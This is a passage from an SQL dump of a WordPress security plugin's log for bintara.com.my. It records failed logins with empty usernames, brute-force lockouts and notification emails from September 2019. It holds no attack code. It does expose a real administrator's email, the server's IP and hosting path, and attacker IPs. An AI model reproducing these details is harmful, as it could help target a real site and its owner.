10:34:36',18089832,19289448,'https://bintara.com.my/2019/wp-login.php',1,0,'47.106.247.125'),(25229,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX82ViJ7D9Gn7wDPh8S4AAAAMQ\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"138.197.146.132\";s:11:\"REMOTE_PORT\";s:5:\"35364\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX82ViJ7D9Gn7wDPh8S4AAAAMQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062105.1971\";s:12:\"REQUEST_TIME\";s:10:\"1569062105\";}}','notice','2019-09-21 10:35:06','2019-09-21 10:35:05',17799776,19289808,'https://bintara.com.my/test/wp-login.php',1,0,'138.197.146.132'),(25225,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:34:31','2019-09-21 10:34:30',18087576,19288760,'https://bintara.com.my/wp/wp-login.php',1,0,'97.74.234.94'),(25226,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX8vGYqJrDl1gYLQWcXOgAAABQ\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"47.106.247.125\";s:11:\"REMOTE_PORT\";s:5:\"50693\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX8vGYqJrDl1gYLQWcXOgAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1569062076.39\";s:12:\"REQUEST_TIME\";s:10:\"1569062076\";}}','notice','2019-09-21 10:34:37','2019-09-21 10:34:36',17799352,19289448,'https://bintara.com.my/2019/wp-login.php',1,0,'47.106.247.125'),(25224,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:34:30\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:34:30\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:49:30\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:49:30\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:34:31','2019-09-21 10:34:30',17882064,19288760,'https://bintara.com.my/wp/wp-login.php',1,0,'97.74.234.94'),(25221,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:33:30\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:33:30\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:48:30\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:48:30\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:33:31','2019-09-21 10:33:30',17881864,19286592,'https://bintara.com.my/wp/wp-login.php',1,0,'89.221.219.30'),(25222,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:33:31','2019-09-21 10:33:30',18087464,19286592,'https://bintara.com.my/wp/wp-login.php',1,0,'89.221.219.30'),(25223,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX8tViJ7D9Gn7wDPh8S0QAAANE\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"97.74.234.94\";s:11:\"REMOTE_PORT\";s:5:\"51637\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX8tViJ7D9Gn7wDPh8S0QAAANE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062069.6625\";s:12:\"REQUEST_TIME\";s:10:\"1569062069\";}}','notice','2019-09-21 10:34:31','2019-09-21 10:34:30',17797192,19288760,'https://bintara.com.my/wp/wp-login.php',1,0,'97.74.234.94'),(25218,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:33:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:33:16\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:48:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:48:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:33:18','2019-09-21 10:33:16',17884240,19289808,'https://bintara.com.my/2019/wp-login.php',1,0,'123.51.152.53'),(25219,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:33:18','2019-09-21 10:33:16',18090008,19289808,'https://bintara.com.my/2019/wp-login.php',1,0,'123.51.152.53'),(25220,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX8eTDrcQxTmGrCWuaHewAAAdA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"89.221.219.30\";s:11:\"REMOTE_PORT\";s:5:\"41512\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX8eTDrcQxTmGrCWuaHewAAAdA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569062009.698\";s:12:\"REQUEST_TIME\";s:10:\"1569062009\";}}','notice','2019-09-21 10:33:31','2019-09-21 10:33:30',17797008,19286592,'https://bintara.com.my/wp/wp-login.php',1,0,'89.221.219.30'),(25217,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX8bGYqJrDl1gYLQWcW7wAAABA\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"123.51.152.53\";s:11:\"REMOTE_PORT\";s:5:\"55508\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX8bGYqJrDl1gYLQWcW7wAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569061996.374\";s:12:\"REQUEST_TIME\";s:10:\"1569061996\";}}','notice','2019-09-21 10:33:18','2019-09-21 10:33:16',17799368,19289808,'https://bintara.com.my/2019/wp-login.php',1,0,'123.51.152.53'),(25215,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:32:34\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:32:34\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:47:34\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:47:34\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:32:35','2019-09-21 10:32:34',17884312,19290400,'https://bintara.com.my/test/wp-login.php',1,0,'144.217.72.200'),(25216,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:32:35','2019-09-21 10:32:34',18090280,19290400,'https://bintara.com.my/test/wp-login.php',1,0,'144.217.72.200'),(25212,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:31:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:31:58\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:46:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:46:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:31:59','2019-09-21 10:31:58',17883096,19289624,'https://bintara.com.my/wordpress/wp-login.php',1,0,'188.254.18.110'),(25213,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:31:59','2019-09-21 10:31:58',18088784,19289624,'https://bintara.com.my/wordpress/wp-login.php',1,0,'188.254.18.110'),(25214,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX8QViJ7D9Gn7wDPh8SrgAAAMg\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.72.200\";s:11:\"REMOTE_PORT\";s:5:\"51080\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX8QViJ7D9Gn7wDPh8SrgAAAMg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061953.9226\";s:12:\"REQUEST_TIME\";s:10:\"1569061953\";}}','notice','2019-09-21 10:32:35','2019-09-21 